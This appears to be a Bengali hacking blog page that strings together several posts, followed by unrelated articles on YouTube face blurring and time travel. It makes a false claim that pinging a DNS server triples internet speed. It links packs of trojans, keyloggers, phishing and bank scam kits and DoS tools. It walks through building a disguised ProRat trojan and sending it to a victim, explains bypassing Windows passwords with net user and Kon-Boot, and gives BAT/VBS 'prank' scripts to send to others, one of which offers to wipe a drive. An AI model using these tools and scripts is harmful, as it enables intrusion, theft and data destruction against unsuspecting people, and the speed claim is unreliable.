শুক্রবার, ৩১ আগস্ট, ২০১২

ইন্টারনেট এর স্পীড কম আর কোন চিন্তা না। সফটওয়্যার ছাড়াই…। 300% SPEED

  • আপনি প্রথমে cmd ওপেন করুন।{stat menu/all programs/accessories/command prompt  or open run search cmd}
  • নিচের command টি দিন।
ipconfig/all

  •  আপনাদের DNS SERVER লাইন টা খুঁজে বের করতে হবে।
  • উপরে IMAGE  এর মতো DNS SERVER এর IP টা NOTRPAD এ লীখে রাখুন বা মনে রাখুন।
  • এবার নিচের COMMAND টা দিন।
ping (ip) -t
যেমনঃ
ping 117.28.224.146 -t
  • ব্যাস কাজ শেষ ।আবার দাখুন ইন্টারনেট এর স্পীড বেরে গেসে।
  • এইটা মুতল আপনার dns server থেকে স্পীড হ্যাক করে।
  • দেখবেন ইন্টারনেট এর স্পীড ৩০০% গুন বেড়ে গেসে।
  • ping stop করতে চাইলে ctrl+c.
****যতক্ষণ ইন্টারনেট এ CONNECT থাকবেন এই টা চালূ রাখুন *******

Hacking Tools ডাউনলোড করুন।

Hacking Tools

CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer’s NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online – Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
http://rapidshare.com/files/50220724/40_Hack_tools.part1.part1.rar
http://rapidshare.com/files/50221144/40_Hack_tools.part1.part2.rar
http://rapidshare.com/files/50221457/40_Hack_tools.part1.part3.rar
softice 4.05 win2000-xp
patchs all in one 2005
nfo-tools all in one
net tools all in one(bes tool for hacking it include almost200 tool
http://rapidshare.com/files/50221899/40_Hack_tools_may_2006.part2.part1.rar
http://rapidshare.com/files/50222295/40_Hack_tools_may_2006.part2.part2.rar
http://rapidshare.com/files/50222617/40_Hack_tools_may_2006.part2.part3.rar
ARABIAN HACKER ATTACKER CD
http://rapidshare.com/files/50223129/Arabian_Attacker_Hacker_s_CD_V.1.0.part1.rar
http://rapidshare.com/files/50223740/Arabian_Attacker_Hacker_s_CD_V.1.0.part2.rar
http://rapidshare.com/files/50224341/Arabian_Attacker_Hacker_s_CD_V.1.0.part3.rar
http://rapidshare.com/files/50224616/Arabian_Attacker_Hacker_s_CD_V.1.0.part4.rar
hacking books
http://rapidshare.com/files/50224916/10_Usefull_Hacking_eBooks.rar
BOT MAKER
http://rapidshare.com/files/50225218/bot___maker.rar
WEBCAM RECORDER
[content suppressed]
CRACK SEARCHING SOFTWARE
http://rapidshare.com/files/50225712/Crack_Searching___Shareware_Ha.softarchive.net.part1.rar
http://rapidshare.com/files/50227224/Crack_Searching___Shareware_Ha.softarchive.net.part2.rar
GMAIL GENERATOR.(tOOL FOR PHISHING)
[content suppressed]
TOOL TO HACK MODEM
http://rapidshare.com/files/50228170/Hack.Modem.v6.rar
HACKING BOOKS AND TUTORIALS
http://rapidshare.com/files/50228314/hacking_books_and_tutorial.rar
HACKER DELIGHT EBOOK
http://rapidshare.com/files/50228433/HD.rar
VIDEO OF Local_Password_Cracking_Presentation_for_the_Indiana_Higher_Education_Cybersecurity_Summit_2005
http://rapidshare.com/files/50228889/Local_Password_Cracking_Presentation_for_the_Indiana_Higher_Education_Cybersecurity_Summit_2005_.swf
Password Hacking AIO
PROXY TOOLS
PROXYHUNTER CHARON
PROXYRAMA
A.P.L
FORUM PROXY LEECHER
AA TOOLS
WORD LIST TOOLS
ATHENA
PARSLEY
RAPTOR
VLSTRIP
LOG SUCKER
S WORDTOOL
VCU
ALS NOVICE
STAPH
HORNY STRIPPER
XXX PASSWORD FINDER
CRACKING TOOLS
ACCESS DIVER
SENTRY
CFORCE
XFACTOR
FORM @
CAECUS 1.2
SPOOF TOOLS
SPLOOF
ZSPOOF
SUPER MEGA SPOOF
HYPERSPOOF
VIDEO TUTORIALS
FORM@
PROXYHUNTER
CFORCE
CHARON
SENTRY2
ACCESS DIVER
Password: dreatica.CL
http://rapidshare.com/files/50230566/Password_Hacking_AIO_WCcT.us.part1.rar
http://rapidshare.com/files/50233332/Password_Hacking_AIO_WCcT.us.part2.rar
http://rapidshare.com/files/50236350/Password_Hacking_AIO_WCcT.us.part3.rar
DATABASE HACKER
http://rapidshare.com/files/50236419/The_Database_Hacker_s_Handbook.rar
TROZEN
http://rapidshare.com/files/50236645/TROJANS.rar
ULTRA HACKER PACK 156 IN 1
95-ME Keygen.rar
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I – Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHPfer.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth – HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip
http://rapidshare.com/files/50237672/ultra_hacker_pack_156_in_1.part1.rar
http://rapidshare.com/files/50238810/ultra_hacker_pack_156_in_1.part2.rar
http://rapidshare.com/files/50239887/ultra_hacker_pack_156_in_1.part3.rar
http://rapidshare.com/files/50240585/ultra_hacker_pack_156_in_1.part4.rar
webcam grabber
http://rapidshare.com/files/50240767/webcamgrabbersimple.zip
YAHOO HACKING STUFF
http://rapidshare.com/files/50241645/yahoo_hacking_stuff.rar
YAHOO MESSENGER PASSWORD SHOW
http://rapidshare.com/files/50241756/Yahoo_Messenger_Password_Show_V2.rar
YAHOO PASSWORD STEALER
http://rapidshare.com/files/50241854/yahoo_passward_stealer.rar
HACKER MONITORING TOOLS.
http://rapidshare.com/files/50243679/monitoring.part1.rar
http://rapidshare.com/files/50245490/monitoring.part2.rar
http://rapidshare.com/files/50247487/monitoring.part3.rar

ভাইরাস বানান । সত্যিকারের ট্রজান ভাইরাস ।

ভাইরাস তৈরীর সফটওয়্যার দ্বারা ভাইরাস তৈরী সত্যিই অনেক সহজ http://www.mediafire.com/?byiatnw915ebytg একটি অত্যান্ত শক্তিশালী প্রোফেশনাল হ্যাকিং সফটওয়্যার। এই সফটওয়্যার দিয়ে খুব সহজে আপনি অন্যের পিসি আপনার নিয়ন্ত্রন আনতে পারেন শুধু তাই না । আরো আছে পিসি নিয়ন্ত্রন ব্যাবস্থা ভেঙ্গে দেওয়া, পিসির সকল ড্রাইভ ফরমেট করা, সব পাসওয়ার্ড চুরি করা, ইচ্ছামত লগ অফ করা, Restart করা, পিসি তে কি করতেসে তা জানা।এসব কিসু জানতে পারেন আপনারকম্পিউটার বসে। কাজ শুরু করার আগে এন্টিভাইরাস disable করে নিন । তা নাহলে এন্টিভাইরাস এটিকে virus হিসেবে ডিটেক্ট করবে ।
যে সফটওয়্যারটি পাবেন সেটা দিয়া একটু সাবধানতা অবলাম্পন করুন। কারন আপনার পিসির কোনো ক্ষতি না হায়। একটু সাবধানে কাজ করুন।
১ । প্রথমে ProRat.exe ফাইলটি চালু করুন। নিচের ছবিটি হল সফটওয়্যারটির মেইন স্ক্রীন ।
no scranshoot.
২ । এরপর create এ ক্লিক করুন । এরপর “Create ProRatt server (342kbayt)” সিলেক্ট করুন।
৩ । এখন নতুন একটা window আসবে । এখানে notifications ট্যাব সিলেক্ট করুন ।
তারপর আপনার ip আড্রেস দিন ।এরপর পাশে টেস্ট এর নিচের আইকনে ক্লিক করুন । যেনো prorat পিসির গোপন সব আপনার কাছে পাঠাতে পারে । এরপর আপনার মেইল আড্রেস দিন । যাতে আক্রান্ত পিসির তথ্য গুলো আপনার মেইল এ চলে আসে ।
৪ । এরপর general ট্যাব সিলেক্ট করুন । এরপর ইচ্ছা মত ভিকটিমের নাম দিন । আর আপনার ইচ্ছা মত পাসওয়ার্ড দিন । এরপর সকল চেক বক্স টিক চিহ্ন দিন ।
৫ । এরপর Bind with File ট্যাবসিলেক্ট করুন ।
৬ । এরপর যে ফাইলটিকে ভাইরাস বানাবেন সেটি ওপেন করুন । তবে ফাইল সাইজ কম হলে ভালো হয় ।
৭ । এরপর Server Extensions ট্যাবে ক্লিক করুন এবং .EXE(Has icon support) সিলেক্ট করা ভাল । কারন এতে আপনি আইকন সাপোর্ট পাবেন, ফলে ভিকটিমকে ধোঁকা দেওয়া সহজ হবে।
৮ । এরপর server icon ট্যাব সিলেক্ট করুন । ফাইলের আইকনপরিবর্তনের জন্য । এরপর পছন্দ মত আইকন নিন ।
৯ । এরপর create server এ ক্লিক করুন । তাহলে binded_server.exe বা server.exe নামে একটি ফাইল তৈরী হবে ।
ভুলেও এটি আপনার পিসিতে ওপেন করবেন না । তাহলে আপনিই ভিকটিমে পরিনত হবেন ।
এরপর এটি জিপ করে ভিকটিমের কাছে পাঠান । এবং ভিকটিম যখন এটি ওপেন করবে তখন আপনার মেইল এ একটি মেইল আসবে । টা আপনি স্প্যাম ফোল্ডারে পাবেন ।
এবার দেখুন কিভাবে ভিকটিম এর পিসির সাথে “Connect” করবেন।
১ । প্রথমে ip লিখুন যেটা আপনি পূর্বে ব্যবহার করেছেন । এরপর পাসওয়ার্ড লিখুন যেটা পূর্বে ব্যবহার করেছেন । এরপর ok দিন ।
২ । হ্যাকারের পিসি তে যে স্ক্রীন দেখাবে তা নিম্নরূপ ।
no scrnshoot
এখানে প্রায় ২৪ধরনের অপশন হ্যাকার দেখতে পাবে । যার দ্বারা হ্যাকার ইচ্ছা মত ভিকটিমের পিসি ব্যবহার করতে পারবেন ।
৩ । এরপর ভিকটিম নিচের মত স্ক্রীন দেখতে পাবে ।
no scranshoot
৪ । এরপর যখন হ্যাকার ভিকটিমের পিসির নিয়ন্ত্রণ নিবে তখন নিচের স্ক্রীন এর মত দেখবে ।
no scranshoot
এই সফটওয়্যারটি দিয়া যে ভাইরাসটি তৈরী করা হল তার নাম হচ্ছে ট্রোজান ভাইরাস। যা দিয়ে আপনি ইচ্ছা করলে ভিকটিমের পিসির অবস্থা খারাপ করতে পারেন ।

Windows 7/8 এর Password হ্যাক করুন খুব সহজে।

খুব সহজেই হ্যাক করুন Windows 7 / 8 এর Password।

এই ট্রিকটির মাধ্যমে আপনি যেকোনো কারো কম্পিউটার এর Password না জেনেও তা চেঞ্জ করে দিতে পারবেন।
এই টিউনটি শুধুমাত্র শিখার জন্য কারো ক্ষতি করবার জন্য নয়।
এটি আমার ক্ষেত্রে কাজ করেছে।
আশা করি আপনাদের খেত্রেও কাজ করবে।
এটা একটি উইন্ডোজ ৭ ও ৮ এর ট্রিক।
এর মাধ্যমে আপনি কোন কম্পিউটার এর Password না জেনেও চেঞ্জ করে দিতে পারবেন।
প্রতিটা স্টেপ মনোযোগ সহকারে করলে আশা করি ট্রিকটি আপনাদের ক্ষেত্রে কাজ করবে।
এতি খুব সহজ একটি ট্রিক।
১/প্রথমে উইন্ডোজ এর সিএমডি ওপেন করতে হবে,

২/তারপর টাইপ করুন
net user (অ্যাকাউন্ট এর নাম) (আপনার Password)

৩/দেখুন কম্পিউটার এর Password চেঞ্জ হয়ে গেছে।
এই ট্রিকটি সুধুমাত্র উইন্ডোজ ৭ এবং উইন্ডোজ ৮ এর ক্ষেত্রে কাজ করবে।

যত সব ভাইরাস কোড।

Cycle a message in your friend’s computer:
open notepad and Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as Anything.BAT and send it to ur frenz or enemy.
Convey your friend a lil’ message and shut down his / her computer:
Type :
wx@echo off
msg * I don’t like you
shutdown -c Error! You are too stupid! -s
Save it as Anything.BAT in All Files and send it.
Open Notepad continually in your friend’s computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32
otepad.exe
GOTO top
Save it as Anything.BAT and send it.
Hack your friend’s keyboard and make him type You are a fool simultaneously
Type :
Set wshShell = wscript.CreateObject(WScript.Shell)
do
wscript.sleep 100
wshshell.sendkeys You are a fool.
loop
Save it as Anything.VBS and send it.
Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.
Toggle your friend’s Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo “
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re “
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? “
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! “
Save it as “Anything.VBS” and send it.
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “Anything.VBS” and send it.
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as “Anything.BAT” and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the ‘Change’ Icon and change the icon from there.
Threten by making screen flash
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
To disable error open task manager (ctrl+shirt+esc) then end process wscript.exe

আপনার পাসওয়ার্ডের দম কতক্ষণ??

JellyMuffin.com - The place for profile layouts, flash generators, glitter graphics, backgrounds and codes
আপনার  পাসওয়ার্ড ভেঙ্গে  গুরিগুরি করতে একজন Hacker কতক্ষণ লাগবে???আর আপনার পাসওয়ার্ডের দুর্বল দিক গুলোই বা কি কি??? সবই জানতে পারবেন।আর অল্পকিছুক্ষণের মধ্যে , ,শুধু আমার সাথে থাকেন।
1st এইখানে click korun

Next এই ওয়েবপেজটি আসবে,enter password ঘরটিতে আপনার পাসওয়ার্ড বসান


দেখছেন ২ হাজার বছর লাগবো।নিচে show details এ click করে কারন  গুলো জেনে নিনকেউ কেউ ভাবতে পারেন এইটা phishing page or something harmful,,তাদেরকে বলা ‘ভাইয়া এইখানে আপনাকে কোনও কিছুতে log in করতে হবে না,বা কোথাও কোনও tracking systemও নাই,তাই ভালো হয় আসব প্রস্ন না তোলা :D
Siteটি Password Security দেখার জন্য খুবই জনপ্রিয় ।

Password break করে যে কোন কম্পিউটার এ admin হিসেবে প্রবেশ করুন ……

এই কাজের জন্য আমাদের যা যা লাগবে
একটা pen drive .
windows password bypass.rar
এবং একটি comruter . (যদি নিজের কম্পিউটার এর password recover করতে হয় , সেক্ষেত্রে অন্যের computer use করতে হবে ।)
প্রথমে windows password bypass.rar এ ক্লিক করে সফটওয়্যারটি download করে নিন । মাত্র ১ এমবি এর সফটওয়্যার ।
এখন YUMI-0.0.1.3.exe open করুন।
click on I Agree. ছবির মত ।এখন আপনি আপনার pen drive এর letter সিলেক্ট করুন।
Format এর পাশের box এ টিক দিন । password crack করার জন্য আপনার pendrive পুরো Format করতে হবে ।
এখন step 2 হতে select a distribution from the following box to put on your usb এ kon-boot Floppy Image সিলেক্ট করুন এবং create button এ click করুন ।
কোন message আসলে yes করুন । আপনার অর্ধেক কাজ শেষ ।
এখন যে কম্পিউটার এর password ছাড়া খুলতে চান ,সে computer এর usb 2.0 port এ pen drive টি লাগান এবং computer চালু করুন ।এখন computer চালু হওয়ার সাথেসাথে bios setup এ যান । Bios setup থাকে advanced BIOS features থাকে First boot device এ removable সিলেক্ট করুন এবং save করে বের হন ।
এখন Computer restart হবে।এখন computer start হলে windows এর logo না এসে YUMI multiboot আসবে।এখন YUMI multiboot usb থাকে other operating systems and tools সিলেক্ট করুন।( default এর নিচে )
Kon boot সিলেক্ট করুন।
এরপর এখন Boot kon boot সিলেক্ট করুন।
এখন দেখবেন password ছাড়াই computer open হয়ে গেছে…

ইউটিউব’এ পরিচয় গোপনের নতুন ফিচার

ইউটিউব সম্প্রতি একটি নতুন ফিচার প্রকাশ করেছে, যেটি ব্যবহার করে ভিডিও’তে প্রদর্শিত মানুষের চেহারা ঘোলা করে দেওয়া যাবে৷ নতুন এই ফিচার অ্যাক্টিভিস্টদেরকে নিপীড়ন থেকে দূরে রাখতে পারে৷

টিউনিশিয়া, মিশর কিংবা হালের সিরিয়া – পৃথিবীর অধিকাংশ মানুষ এসব দেশের আন্দোলনের খবর মূলত পাচ্ছে বিভিন্ন অনলাইন সূত্র থেকে৷ উদাহরণস্বরূপ বলা যেতে পারে, অপেশাদার বিভিন্ন ভিডিও’র কথা যেগুলো ধারণ করছে নাগরিকরা৷ এরপর সেগুলো তুলে দিচ্ছে ইউটিউব’এ৷ বিভিন্ন দেশে পুলিশ এবং সামরিক বাহিনীর নিপীড়নের খবর জানা যায় এসব ভিডিও থেকে৷
কিন্তু এসব ভিডিও’র একটি মন্দ দিকও আছে৷ যাদেরকে এসব ভিডিও থেকে শনাক্ত করা সম্ভব, দেখা যায় পরবর্তীতে তাদেরকে নির্যাতন করে নিরাপত্তা বাহিনী৷ ফলে ভিডিও আপলোডকারী নাগরিক সাংবাদিক কিংবা আন্দোলনকারীদের পরিচয় গোপনের বিষয়টিও সমানভাবে গুরুত্বপূর্ণ৷
সম্প্রতি গুগল তার ভিডিও প্ল্যাটফর্ম ইউটিউবের জন্য একটি নতুন টুল তৈরি করেছে, যা ব্যবহার করে ভিডিও’তে থাকা বিভিন্ন ব্যক্তির চেহারা স্বয়ংক্রিয়ভাবে ঘোলা করে দেওয়া যাবে৷
আনুষ্ঠানিক ব্লগ সাইটে ইউটিউব জানিয়েছে, ‘‘যেহেতু সাধারণ নাগরিকরা বিশ্বের বিভিন্ন দেশের খবর এবং মানবাধিকার লঙ্ঘন বিষয়ক ভিডিও সরবরাহের ক্ষেত্রে গুরুত্বপূর্ণ ভূমিকা পালন করছে, তাই ইউটিউব আরো ভালো টুল তৈরির মাধ্যমে তাদেরকে সহায়তায় প্রতিশ্রুতিবদ্ধ৷”
ইউটিউব’এর দাবি, সংস্থাটি সর্বপ্রথম চেহারো গোপন রাখার নতুন এই ফিচার প্রকাশ করেছে৷ ইউটিউব’এর ‘ভিডিও ম্যানেজার’ অপশনে এই ফিচারটি পাওয়া যাবে৷ সেখানে আপলোডকৃত ভিডিওর ডানপাশে ‘এডিট’ বাটন রয়েছে৷ এই বাটনে ক্লিকের পর ‘এনহেন্সমেন্টস’ নির্বাচন করতে হবে৷ সবশেষে ‘এডিশনাল ফিচারস’-এ পাওয়া যাবে ‘ব্লার অল ফেসেস’ ফিচারটি৷
এই ফিচার ‘এপ্লাই’ করার পর দ্রুত ইউটিউব আপলোডকৃত ভিডিও’র দুটি সংস্করণ পাশাপাশি প্রদর্শন করবে৷ একটি হচ্ছে আসল ভিডিও, অন্যটি চেহারা ঘোলা করা ভিডিও৷ ব্যবহারকারী চাইলে, এখান থেকে আসল ভিডিও’টি মুছে দিয়ে শুধু সম্পাদিত ভিডিওটি প্রদর্শনের জন্য উম্মুক্ত করতে পারবে৷
বলাবাহুল্য, ইউটিউব’এর এই ফিচার নিয়ে ইতিমধ্যে বিস্তর অভিযোগ উঠেছে৷ কারণ এটি এখনো আশানুরূপ পর্যায়ে ফলাফল প্রদর্শন করছে না৷ বিশেষ করে চেহারার কৌণিক অবস্থান, আলোর ধরন, প্রতিবন্ধকতা এবং সর্বোপরি ভিডিও’র মানের কারণে ‘ব্লার’ ফাংশনের কার্যকারিতায় ব্যাপক তারতম্য ঘটছে৷ ইউটিউব অবশ্য এই অভিযোগ স্বীকার করে জানিয়েছে, তারা এটির উন্নয়নে কাজ চালিয়ে যাচ্ছে৷

টাইম মেশিন: সম্ভাবনা আর আধুনিক পদার্থবিজ্ঞান!

স্বার্থপর বলে একটা শব্দ আছে বাংলায়, আমার এক খুব কাছের মানুষ অবশ্য এ শব্দটাকে বলতো ‘স্বার্থনিজ’। অবশ্য সে যখন মুখে একটা মিস্টি হাসি দিয়ে এ কথাটা বলতো তখন মনে হতো সে যা বলেছে তাই ঠিক। আসলে ইদানিং একটা কথা শুধু কথার কথা এজন্য শোনা,’সময়ের চেয়ে জীবনের মূল্য অনেক বেশী’। কিন্তু আমি বলবো,’জীবনের চেয়ে সময়ের মূল্য অনেক বেশী’। অবশ্য ব্লগে আমি যেভাবে সহজ ভাবে বলছি, বাইরে বললে আমাকে পাগল ঠাওরাবে। কিন্তু আমি যদি বলি: টাইম ট্রাভেল করা সত্যিকার ভাবে সম্ভব, তখন হয়তো মফস্বলে গেলে পাগলা গারদ দেখালেও বুয়েট-বিআইটিতে আসলে কিছুটা রক্ষে পাওয়া যাবে।তাহলে আজকে আমরা সবাই ভবিষ্যত বা অতীতের শখ পূরন করার জন্য যে ধাপ গুলো পার করা গেছে সেগুলো জানি এবং কালকে থেকে আমার পিঠ বাচানোর রাস্তা করি!Cool Imageএইচ জি ওয়েলস 1895 সালে একটা গল্পের বই লেখেন The Time Machine.তখন কল্পকাহিনী হিসেবে এটাকে সবাই ধরে নিয়েছিলো, এবং অনেকেরই হাপিত্যেস ছিলো ‘যদি এটা হতো’, যেখানে আমরা তখন ব্রিটিশদের ডলা খেতেই ব্যাস্ত ছিলাম। তার কিছু দিন পর আইনস্টাইন নামের এক কেরানী ফিজিক্সে কিছুটা পরিবর্তন এনে এ যুগের পদার্থবিজ্ঞানের বাপ হয়ে গেলেন।তবে সে এটা দেখিয়ে ছিলেন আমাদের পক্ষে আলোর গতিতে চলা অসম্ভব।গবেষনা কিন্তু থেমে থাকেনি। টাইম মেশিন গবেষনার ক্ষেত্রে যেটা মূল বিষয় বস্তু সেটা হলো ঘটনা এবং তার প্রতিক্রিয়া। যদি আমরা প্রকৃতির ইউনিফাইড থিওরেমের দিকে ঝুকতে যাই এই টাইম ট্রাভেল কনসেপ্ট সেখানে আঘাত হানে, যেমন শক্তির নিত্যতা সূত্র। অবশ্য এখানে আরেকটা কথা মার খেয়ে যায়, বহু পুরোনো কথা:” প্রকৃতি শূণ্যতা পছন্দ করে না”।
টাইম মেশিন বানানো কি সোজা কথা?
